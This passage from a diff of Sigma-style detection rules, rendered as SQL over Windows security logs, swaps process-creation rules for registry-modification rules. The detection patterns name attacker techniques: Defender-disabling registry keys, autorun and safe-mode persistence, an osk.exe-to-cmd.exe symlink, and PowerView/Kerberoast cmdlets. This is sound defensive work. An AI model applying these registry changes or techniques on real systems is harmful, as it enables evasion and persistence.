ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + 
"filename": "registry_set_disable_administrative_share.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", - "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1562.001" ], "falsepositives": [ - "Command lines that use the same flags" + "Administrator actions" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Potential Attachment Manager Settings 
Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": 
"59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "status": "experimental", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", + "attack.persistence", "attack.defense_evasion", - "attack.t1216" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "PUA - Wsudo 
Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "status": "test", + "description": "Detects 
modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + }, + { + "title": "Registry Persitence via Service in Safe Mode", + 
"id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR 
CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 
'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Windows Defender Service Disabled", + 
"id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + 
"description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - 
